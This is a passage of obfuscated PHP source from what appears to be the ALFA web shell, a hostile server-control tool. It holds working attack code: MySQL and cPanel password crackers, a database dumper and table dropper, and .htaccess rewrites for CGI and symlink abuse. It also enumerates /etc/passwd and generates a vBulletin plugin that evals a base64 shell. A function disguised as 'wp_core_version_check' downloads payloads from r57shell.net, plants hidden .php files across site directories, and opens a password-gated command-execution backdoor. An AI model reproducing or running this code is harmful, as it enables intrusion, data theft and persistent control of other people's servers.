"KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "calfa866": $db->setCharset("calfa866"); break; } goto XLket; S5lTc: if (count($json["tbl"]) > 0) { if ($_POST["alfa1"] == "dumpfile") { if ($fp = @fopen($json["file"], "w")) { goto E0SGe; E0SGe: foreach ($json["tbl"] as $v) { $db->dump($v, $fp); } goto ONP0a; EIbNG: $dumpStatus = true; goto vcDt3; ONP0a: fclose($fp); goto EIbNG; vcDt3: } } else { foreach ($json["tbl"] as $v) { $db->query("DROP TABLE " . $v); } } } goto J0X8p; J0X8p: unset($_POST["alfa2"]); goto qy1uM; l5EPL: $db->selectdb($_POST["sql_base"]); goto Eqm4s; XLket: $json = json_decode($_POST["alfa2"], true); goto S5lTc; qy1uM: } goto i2Hyq; i2Hyq: alfahead(); goto ajV7s; q1B1o: if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { goto zxtk4; a2Yo0: echo "</select>"; goto AU4LG; StFXx: while ($item = $db->fetch()) { list($key, $value) = each($item); echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } goto a2Yo0; FAMts: $db->listDbs(); goto Z62ai; u3zVq: switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("calfa1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "calfa866": $db->setCharset("calfa866"); break; } goto koZic; Gqo1e: $_SESSION["sql_base"] = $_POST["sql_base"]; goto u3zVq; Z62ai: echo "<select name=sql_base><option value=''></option>"; goto StFXx; quFKT: $_SESSION["sql_pass"] = $_POST["sql_pass"]; goto Gqo1e; CEkeO: $_SESSION["sql_login"] = $_POST["sql_login"]; goto quFKT; zxtk4: $_SESSION["sql_host"] = $_POST["sql_host"]; goto CEkeO; koZic: $db->setCharset("utf8"); goto FAMts; AU4LG: } else { echo $tmp; } } else { echo $tmp; } goto sZFW2; xRneE: echo "</div>"; goto k8toS; k8toS: alfafooter(); goto ZYaZO; ZYaZO: } goto ib3Lc; PHDKT: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $GLOBALS["sys"] = "win"; } else { $GLOBALS["sys"] = "unix"; } goto i967k; kB8SH: if (!isset($GLOBALS["DB_NAME"]["show_icons"])) { exit("$GLOBALS['DB_NAME']['show_icons']"); } goto DjH8C; ZNx0t: if (!$XDmfxOnhck("b" . "ase" . "6" . "4_deco" . "d" . "e")) { function QFdAWqZnUX($input) { goto d7TPS; yd4Sp: $input = preg_replace("[^A-Za-z0-9\+\/\=]", '', $input); goto rBHxp; goC7_: return $output; goto SbuIp; p0IrD: $i = 0; goto T96o7; T96o7: $output = ''; goto yd4Sp; d7TPS: if (empty($input)) { return; } goto UGog2; rBHxp: do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = $enc1 << 2 | $enc2 >> 4; $chr2 = ($enc2 & 15) << 4 | $enc3 >> 2; $chr3 = ($enc3 & 3) << 6 | $enc4; $output = $output . chr((int) $chr1); if ($enc3 != 64) { $output = $output . chr((int) $chr2); } if ($enc4 != 64) { $output = $output . chr((int) $chr3); } $chr1 = $chr2 = $chr3 = ''; $enc1 = $enc2 = $enc3 = $enc4 = ''; } while ($i < strlen($input)); goto goC7_; UGog2: $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; goto Kp4YY; D4l1m: $enc1 = $enc2 = $enc3 = $enc4 = ''; goto p0IrD; Kp4YY: $chr1 = $chr2 = $chr3 = ''; goto D4l1m; SbuIp: } } else { function QFdAWqZnUX($s) { $b = "b" . "ase" . "6" . "4_deco" . "d" . "e"; return $b($s); } } goto NsqqZ; tNC7F: function alfaGetDisFunc() { goto CT7VK; CT7VK: alfahead(); goto w6gsh; UCzWI: foreach ($f as $s) { goto awOzk; sIE2k: if (function_exists($s) || !is_callable($s)) { continue; } goto fTszn; bSg6k: $i++; goto MWQ_Z; awOzk: $s = trim($s); goto sIE2k; v_bLj: echo "<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function." . str_replace("_", "-", $s) . ".php"><span class="disable_functions"><b>" . $s . "</b></span></a></td>"; goto bSg6k; fTszn: echo "<tr><td align="center" style="background-color: black;">" . $i . "</td>"; goto v_bLj; MWQ_Z: } goto ejxha; Iej_C: $s = explode(",", $disfun); goto Q22be; j9DGA: $disfun = @ini_get("disable_functions"); goto Iej_C; Ewcnw: echo "</div>"; goto xvapa; xvapa: alfafooter(); goto BNjrY; PbWM7: $i = 1; goto UCzWI; SgrY5: echo "<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>"; goto PbWM7; Q22be: $f = array_unique($s); goto SgrY5; w6gsh: echo "<div class="header">"; goto j9DGA; ejxha: echo "</table></center>"; goto Ewcnw; BNjrY: } goto SlYwg; DfS0Z: define("__LAST_CWD__", "last_cwd_" . __ALFA_MD5NAME__); goto vyOkU; tsIKa: $GLOBALS["DB_NAME"] = $GLOBALS["NeUSMyPGXP"]; goto D1CXD; AZtgr: function alfaziper() { goto n3mFU; n3mFU: alfahead(); goto RoJsV; cFWCP: if (isset($_POST["alfa5"]) && $_POST["alfa5"] == ">>") { goto TRvIy; LE9Vg: $zipfile = $_POST["alfa4"]; goto J9CRg; TRvIy: $dirzip = $_POST["alfa3"]; goto LE9Vg; J9CRg: if (class_exists("ZipArchive") && ($GLOBALS["sys"] != "unix" || !_alfa_can_runCommand(true, true))) { goto cBIxn; ctEZP: $newfunc = create_function("$source,$destination", $code); goto IKrql; IKrql: if ($newfunc($dirzip, $zipfile)) { echo __pre() . "<center><p><font color="green">Success...!<br>" . $zipfile . "</font></p></center>"; } else { echo __pre() . "<center><p><font color="red">ERROR!!!...</font></p></center>"; } goto duFT8; cBIxn: $code = "if(!extension_loaded('zip')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace('\\','/',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace('\\','/',$file);if(in_array(substr($file,strrpos($file,'/')+1),array('.','..')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.'/','',$file.'/'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.'/','',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();"; goto ctEZP; duFT8: } else { alfaEx("cd '" . addslashes(dirname($zipfile)) . "';zip -r '" . addslashes(basename($zipfile)) . "' '" . addslashes($dirzip) . "' > /dev/null &"); echo __pre() . "<center><p>Please Wait For 1 minutes AND Check this -> <b><font color="green">" . $zipfile . "</font></b><br>Because We Executed The Command in The background !</p></center>"; } goto dlgI3; dlgI3: } goto p2Q7i; p2Q7i: echo "</div>"; goto gZrHF; JjBxo: echo "<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>\xd
<form onSubmit="g('ziper',null,null,null,this.dirzip.value,this.zipfile.value,'>>');return false;" method="post">
\xa<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="" . htmlspecialchars($GLOBALS["cwd"]) . "" size="60"/>
<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="" . $GLOBALS["cwd"] . "alfa.zip" size="60"/>
\xa<input type="submit" value=" " name="ziper" />\xd
</form></center></p>"; goto cFWCP; RoJsV: AlfaNum(8, 9, 10); goto JjBxo; gZrHF: alfafooter(); goto fJHc2; fJHc2: } goto QA5cV; zhsok: function Alfa_CP_Cracker($info) { goto qM2F5; kHNNe: curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); goto iteMt; NLc9C: curl_close($curl); goto Gd4Gn; qM2F5: $url = $info["protocol"] . $info["target"] . ":" . $info["port"]; goto eSTjW; nt9ub: $curl_error = curl_error($curl); goto lCtRP; sYo9a: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); goto qsVRU; OoxFf: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); goto sYo9a; qsVRU: curl_setopt($curl, CURLOPT_HEADER, 0); goto gI8AP; Nbw0z: curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info["username"] . ":" . $info["password"]) . "

")); goto wmncM; e0WZl: $curl_errno = curl_errno($curl); goto nt9ub; gI8AP: curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); goto Nbw0z; iteMt: curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0"); goto OoxFf; lCtRP: if ($curl_errno > 0) { echo "<font color='red'>Error: {$curl_error}</font><br>"; } elseif (preg_match("/filemanager/i", $result)) { goto JtGR6; ocHHY: CrackerResualt($info); goto FRAOL; eNarQ: $info["target"] = $url; goto ocHHY; JtGR6: echo "UserName: <font color="red">" . $info["username"] . "</font> PassWord: <font color="red">" . $info["password"] . "</font><font color="green">  Login Success....</font><br>"; goto eNarQ; FRAOL: } goto NLc9C; eSTjW: $curl = curl_init(); goto kHNNe; wmncM: curl_setopt($curl, CURLOPT_URL, $url); goto iFNlZ; iFNlZ: $result = curl_exec($curl); goto e0WZl; Gd4Gn: } goto D494U; YuoxJ: function alfacgihtaccess($m, $d = '', $symname = false) { goto B3AA0; tKMEG: if ($m == "cgi") { $code = "#Coded By Sole Sad & Invisible\xaOptions FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .alfa
AddHandler cgi-script .alfa"; } elseif ($m == "sym") { $code = "#Coded By Sole Sad & Invisible
Options Indexes FollowSymLinks
DirectoryIndex solevisible.phtm
AddType text/plain php html php4 phtml\xaAddHandler text/plain php html php4 phtml{$readme}
Options all"; } elseif ($m == "shtml") { $code = "Options +Includes\xaAddType text/html .shtml
AddHandler server-parsed .shtml"; } goto laiXn; i5wbg: if ($symname) { $readme = "
ReadmeName " . trim($symname); } goto tKMEG; laiXn: @__write_file($d . ".htaccess", $code); goto tYeLV; B3AA0: $readme = ''; goto i5wbg; tYeLV: } goto YcC07; MYoFh: @ini_set("magic_quotes_runtime", 0); goto eTrml; GehJu: @session_start(); goto T6qB5; YcC07: function alfabasedir() { goto oe4Yd; o77eE: $passwd = _alfa_file("/etc/passwd"); goto VRUz5; hS4wp: alfafooter(); goto qLAIU; VRUz5: if (is_array($passwd)) { goto Ds2dD; a9s3u: foreach ($users as $user) { goto NfhFt; NfhFt: if (empty($user)) { continue; } goto HfXUL; HfXUL: $path = str_replace("{user}", $user, $makepwd); goto c_o7x; c_o7x: echo "<form method=post onsubmit='g("FilesMan",this.c.value,"");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>{$user}</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='{$path}'><input type=submit value='>>'></form><br>"; goto xL3pO; xL3pO: } goto l0qR1; TfZt1: echo "<b><font color="#FF0000">[~] Searching for passwords in config files...

" . "<br /><br /><br /></font></b>"; goto a9s3u; aPgUz: if (_alfa_can_runCommand(true, false) && ($basedir || $safe_mode)) { goto ljJSw; eSjt3: if ($x >= 2) { array_pop($users); --$x; } goto xE7EG; oyNHV: $x = count($users); goto eSjt3; NIiar: $users = json_decode($bash_users, true); goto oyNHV; ljJSw: $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP"; goto vghFz; QtoAz: $bash_users = alfaEx("cd alfacgiapi;sh basedir.alfa " . $makepwd, false, true, true); goto NIiar; vghFz: alfaWriteTocgiapi("basedir.alfa", $bash); goto QtoAz; xE7EG: } goto RzSVE; RzSVE: if (!$basedir && !$safe_mode) { $x = 0; foreach ($passwd as $str) { goto Vfyr2; Vfyr2: $pos = strpos($str, ":"); goto oFH8d; J5PKl: $dirz = str_replace("{user}", $username, $makepwd); goto kLm5r; oFH8d: $username = substr($str, 0, $pos); goto J5PKl; kLm5r: if ($username != '') { if (@is_readable($dirz)) { array_push($users, $username); $x++; } } goto UtbJu; UtbJu: } } goto YUvAk; V8Qms: echo "<b><font color="#FFFFFF">[+] Founded " . $x . " readable " . str_replace("{user}", "*", $makepwd) . " directories
" . "<br /></font></b>"; goto TfZt1; YUvAk: echo "<br><br>"; goto SR0_5; Ds2dD: $users = array(); goto Nj_qW; DuhiY: $safe_mode = @ini_get("safe_mode"); goto aPgUz; Nj_qW: $makepwd = alfaMakePwd(); goto Qemm2; SR0_5: echo "<b><font color="#00A220">[+] Founded " . sizeof($passwd) . " entrys in /etc/passwd
" . "<br /></font></b>"; goto V8Qms; Qemm2: $basedir = @ini_get("open_basedir"); goto DuhiY; l0qR1: } else { echo "<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>"; } goto zxvGZ; zxvGZ: echo "<br><br></b>"; goto Tx8Hr; Tx8Hr: echo "</div>"; goto hS4wp; oe4Yd: alfahead(); goto NCMIa; NCMIa: echo "<div class=header>
\xa<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>"; goto o77eE; qLAIU: } goto ZkSgh; bLMcf: function __download($url, $path = false) { goto mjPxF; wIWPH: $saveas = basename(rawurldecode($url)); goto Sivt3; k0njs: if (@is_file($saveas)) { return true; } goto qUZQ4; qUZQ4: $buff = alfaEx("lynx -source " . $url . " > " . $saveas); goto aqGRa; mjPxF: if (!preg_match("/[a-z]+:\/\/.+/", $url)) { return false; } goto wIWPH; Z3sYG: $buff = alfaEx("curl " . $url . " -o " . $saveas); goto RvJBT; aqGRa: if (@is_file($saveas)) { return true; } goto Pf1Jw; lb7St: $buff = alfaEx("wget " . $url . " -O " . $saveas); goto UHkLb; RvJBT: if (@is_file($saveas)) { return true; } goto PdbUr; RFvWS: return false; goto ce1iF; FO01g: $buff = alfaEx("fetch -o " . $saveas . " -p " . $url); goto Qt8Ay; MTmcu: $buff = alfaEx("links -source " . $url . " > " . $saveas); goto NfYm6; UHkLb: if (@is_file($saveas)) { return true; } goto Z3sYG; Sivt3: if ($path) { $saveas = $path . $saveas; } goto loqgv; Pf1Jw: $buff = alfaEx("GET " . $url . " > " . $saveas); goto NWLcB; loqgv: if ($content = __read_file($url)) { if (@is_file($saveas)) { @unlink($saveas); } if (__write_file($saveas, $content)) { return true; } } goto lb7St; NWLcB: if (@is_file($saveas)) { return true; } goto MTmcu; Qt8Ay: if (@is_file($saveas)) { return true; } goto RFvWS; PdbUr: $buff = alfaEx("lwp-download " . $url . " " . $saveas); goto k0njs; NfYm6: if (@is_file($saveas)) { return true; } goto FO01g; ce1iF: } goto udtXj; LiSIN: if ($GLOBALS["cwd"][strlen($GLOBALS["cwd"]) - 1] != "/") { $GLOBALS["cwd"] .= "/"; } goto qXYAO; yItN7: @error_reporting(E_ALL ^ E_NOTICE); goto fBhqD; DvW2j: if (!isset($GLOBALS["DB_NAME"]["pass"])) { exit("$GLOBALS['DB_NAME']['pass']"); } goto JjHhJ; vyOkU: define("__PATH_HISTORY__", "path_history_" . __ALFA_MD5NAME__); goto V21nO; Kt2cJ: function alfaDumper() { goto yZy2w; fFV9r: AlfaNum(8, 9, 10); goto q90Bw; nxCW2: alfafooter(); goto qQHcO; AKmIj: echo "<div class="header">"; goto fFV9r; q90Bw: echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>" . getConfigHtml("all") . "<form method='post' onsubmit="g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;"><p>"; goto aI0e7; NelYk: $dbname = $_POST["alfa5"]; goto qdQrd; qdQrd: $dfile = $_POST["alfa6"]; goto a4SDz; AoxP9: create_table($table); goto jyVBS; jyVBS: echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>"; goto bueoE; aU_TD: if (!empty($dbname)) { goto sAP1a; sAP1a: echo __pre(); goto z3BiT; z3BiT: $msg = "<center>Check this :  <font color='red'>" . $dfile . "</font></center>"; goto bt9H2; bt9H2: if (@mysqli_connect($host, $username, $password, $dbname)) { if (strlen(alfaEx("mysqldump")) > 0) { alfaEx("mysqldump --single-transaction --host="{$host}" --user="{$username}" --password="{$password}" {$dbname} > '" . addslashes($dfile) . "'"); echo $msg; } else { __alert("Error...!"); } } else { echo "<center>mysqli_connect : Error!</center>"; } goto RlvZw; RlvZw: } goto D0_SY; g_WcP: $password = $_POST["alfa4"]; goto NelYk; aI0e7: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "db_host : ", "inputName" => "db_host", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "db_username : ", "inputName" => "db_username", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "db_password : ", "inputName" => "db_password", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "db_name : ", "inputName" => "db_name", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Dump Path: ", "inputName" => "dfile", "inputValue" => htmlspecialchars($GLOBALS["cwd"]) . "alfa.sql", "inputSize" => "50")); goto AoxP9; bueoE: $username = $_POST["alfa3"]; goto g_WcP; D0_SY: echo "</div>"; goto nxCW2; a4SDz: $host = $_POST["alfa7"]; goto aU_TD; yZy2w: alfahead(); goto AKmIj; qQHcO: } goto gWi5O; ceo7a: function Alfa_Mysql_Cracker($info) { if (@mysqli_connect($info["target"] . ":" . $info["port"], $info["username"], $info["password"])) { CrackerResualt($info); echo "UserName: <font color="red">" . $info["username"] . "</font> PassWord: <font color="red">" . $info["password"] . "</font><font color="green">  Login Success....</font><br>"; } } goto rI1gc; xrWHI: function alfaphp2xml() { goto HqVKB; HZNuU: echo "</center></div>"; goto qP0BY; ua5pV: echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit="g('php2xml',null,this.code.value,'>>'); return false;" method='post'>\xd\xa<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder="insert your shell code"></textarea><br/><br/>
\xa<input type='submit' name='go' value=' ' /></p></form></center>"; goto TXYY9; HqVKB: alfahead(); goto tl1t2; qP0BY: alfafooter(); goto ftu5W; tl1t2: AlfaNum(8, 9, 10, 7, 6, 5, 4, 3); goto ua5pV; TXYY9: if ($_POST["alfa2"] && $_POST["alfa2"] == ">>") { goto ErwWN; D3nmo: echo "</textarea></center></p>"; goto DEF5K; sBW1E: echo "<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER['PHP_SELF'],"subscriptions.php")){eval(base64_decode('" . __ZW5jb2Rlcg($_POST["alfa1"]) . "'));exit;}]]></phpcode></plugin></plugins>"; goto D3nmo; ErwWN: echo __pre() . "<p><center><textarea rows='10' name='users' cols='80'>"; goto sBW1E; DEF5K: } goto HZNuU; ftu5W: } goto YZnih; cLCU3: define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"])); goto BKmVF; aS3hK: if (isset($_POST["c"])) { if (!@chdir($_POST["c"])) { $GLOBALS["glob_chdir_false"] = true; } } goto c16Cg; NsqqZ: $gEleJRqGNj = "create_fun" . "ct" . "io" . "n"; goto PME30; c0fnP: function __showicon($r) { goto OgTJ5; dw5uF: $s["loader"] = "http://solevisible.com/images/loader.png"; goto LCVC_; IymAG: $s["alfamini"] = "http://solevisible.com/images/alfamini.png"; goto dw5uF; OgTJ5: $s["btn"] = "http://solevisible.com/images/btn.png"; goto IymAG; LCVC_: return $s[$r]; goto LoX5x; LoX5x: } goto K5_dd; ydVbV: if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto Q77k5; lr1hY: $request_uri = $_SERVER["REQUEST_URI"]; goto jXoi2; ePTpq: $uri_path = dirname($uri_path); goto R8zkB; k1Fij: $uri_path = $parse_url["path"]; goto ePTpq; Q77k5: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto lr1hY; srV5H: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto ETCQ4; tENCW: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto srV5H; jXoi2: $parse_url = parse_url($request_uri); goto k1Fij; WyK0K: if (!file_exists($tmp_file)) { goto YzPgo; iKVeX: @touch($tmp_file); goto td45n; td45n: @file_put_contents($tmp_file, $response); goto zlXty; YzPgo: if (function_exists("curl_init")) { goto Lj4cE; Lj4cE: $ch = curl_init(); goto dDNAk; lMHgA: $response = curl_exec($ch); goto rASzs; Yzs6f: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto lMHgA; rASzs: curl_close($ch); goto Hvcst; DLwyo: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto Yzs6f; dDNAk: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto DLwyo; Hvcst: } else { goto PQixm; Xoat3: $context = stream_context_create($opts); goto RSTzT; PQixm: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto JCJQI; JCJQI: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto Xoat3; RSTzT: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto W61sY; W61sY: } goto iKVeX; zlXty: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto n0kiB; acI0m: @file_put_contents($tmp_file, $response); goto OGG03; xodFL: @touch($tmp_file); goto acI0m; n0kiB: if (function_exists("curl_init")) { goto q_PtO; x0ZA6: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto lljyp; CfqPC: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto x0ZA6; HHTaJ: curl_close($ch); goto QzluP; q_PtO: $ch = curl_init(); goto KAjk6; KAjk6: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto CfqPC; lljyp: $response = curl_exec($ch); goto HHTaJ; QzluP: } else { goto x9CtN; ssWRx: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto WSRzO; x9CtN: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto Vqht5; Vqht5: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto Bc_lb; Bc_lb: $context = stream_context_create($opts); goto ssWRx; WSRzO: } goto xodFL; OGG03: } } goto mPl3k; mPl3k: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto yiEDn; R8zkB: $file_path = dirname($document_file); goto tENCW; paNSt: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto c0Whk; yiEDn: foreach ($dirs as $d) { goto J6RjM; J6RjM: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto X9fRd; Vjb9k: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto jPkex; X9fRd: @file_put_contents($file_name, $response); goto Vjb9k; jPkex: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } } goto kA55Z; kA55Z: } goto BDRXe; ETCQ4: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto paNSt; c0Whk: if (@$_GET["slince_golden"]) { goto MEr8h; Kt_Fw: if (md5(sha1(@$_GET["is"])) == $response) { goto Wv914; Wv914: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto sV9dg; sV9dg: if (@$_GET["m"]) { goto N7565; mtOF7: @file_put_contents($file_name_path, $response); goto N5Uae; ul8yW: $file_name_path = @$_GET["m"] . "gagal.php"; goto mtOF7; N5Uae: echo $file_name_path; goto DWFTY; N7565: if (function_exists("curl_init")) { goto a1Z5E; FyQWb: curl_close($ch); goto ISBA0; pTDMU: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto r54K3; r54K3: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto hghXj; a1Z5E: $ch = curl_init(); goto pTDMU; hghXj: $response = curl_exec($ch); goto FyQWb; ISBA0: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto ul8yW; DWFTY: } goto cB3Dx; cB3Dx: if (@$_POST["l"]) { function basic_code_extensions($request) { goto iaOnO; w15q7: $tmpf = stream_get_meta_data($tmp); goto BG8gK; VTm7U: fclose($tmp); goto uWWnx; uWWnx: return $ret; goto YHCDL; l0VOx: fwrite($tmp, $request); goto DwHIQ; BG8gK: $tmpf = $tmpf["uri"]; goto l0VOx; DwHIQ: $ret = (include $tmpf); goto VTm7U; iaOnO: $tmp = tmpfile(); goto w15q7; YHCDL: } print_r(basic_code_extensions($_POST["l"])); } goto vxz5e; vxz5e: } goto JHnFT; JHnFT: exit; goto ny6g0; MEr8h: echo "<!-- //Silence is golden. -->"; goto V329W; V329W: if (function_exists("curl_init")) { goto hyII0; oXpc4: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto EWRm9; hyII0: $ch = curl_init(); goto lGEAe; EWRm9: $response = curl_exec($ch); goto HbdTD; HbdTD: curl_close($ch); goto shZS_; lGEAe: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto oXpc4; shZS_: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto Kt_Fw; ny6g0: } goto WyK0K; BDRXe: } wp_core_version_check(); } goto F6Q1N; BKmVF: define("__ALFA_VERSION__", "3.0.2"); goto DfS0Z; smFap: class AlfaCURL { public $headers; public $user_agent; public $compression; public $cookie_file; public $proxy; public $path; public $ssl = false; public $curl_status = true; function __construct($cookies = false, $compression = "gzip", $proxy = '') { goto K531d; P6639: $this->cookies = $cookies; goto IYRVZ; k9tpL: $this->headers[] = "Connection: Keep-Alive"; goto Hp6Gi; IYRVZ: if ($this->cookies) { $this->cookie($this->path); } goto XlMhs; vNGVM: $this->compression = $compression; goto QbLgs; SE1x0: $this->headers[] = "Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg"; goto k9tpL; QbLgs: $this->proxy = $proxy; goto P6639; K531d: if (!extension_loaded("curl")) { $curl_status = false; return false; } goto SE1x0; Hp6Gi: $this->headers[] = "Content-type: application/x-www-form-urlencoded;charset=UTF-8"; goto vxGQt; vxGQt: $this->user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"; goto ZCtKH; ZCtKH: $this->path = ALFA_TEMPDIR . "/Alfa_cookies.txt"; goto vNGVM; XlMhs: } function cookie($cookie_file) { if (_alfa_file_exists($cookie_file, false)) { $this->cookie_file = $cookie_file; } else { goto yHxnQ; ZBoqs: $this->cookie_file = $cookie_file; goto ff33m; ff33m: @fclose($this->cookie_file); goto MljsN; yHxnQ: @fopen($cookie_file, "w") or die($this->error("The cookie file could not be opened.")); goto ZBoqs; MljsN: } } function Send($url, $method = "get", $data = '') { goto vPi4y; JYhfM: return $return; goto nHjno; vPm7c: if ($method == "post") { goto kYHFE; dFKjI: curl_setopt($process, CURLOPT_HTTPHEADER, array("Content-Type: application/x-www-form-urlencoded")); goto i5XpH; kYHFE: curl_setopt($process, CURLOPT_POSTFIELDS, $data); goto ZDHfF; ZDHfF: curl_setopt($process, CURLOPT_POST, 1); goto dFKjI; i5XpH: } goto Ufndw; nfwZd: if ($this->proxy) { curl_setopt($process, CURLOPT_PROXY, $this->proxy); } goto vPm7c; cfx2o: curl_close($process); goto JYhfM; KAvbf: if ($this->cookies) { curl_setopt($process, CURLOPT_COOKIEFILE, $this->path); curl_setopt($process, CURLOPT_COOKIEJAR, $this->path); } goto nfwZd; DxQ4F: curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers); goto KO6iO; pjBxq: if ($this->ssl) { curl_setopt($process, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($process, CURLOPT_SSL_VERIFYHOST, false); } goto KAvbf; vPi4y: if 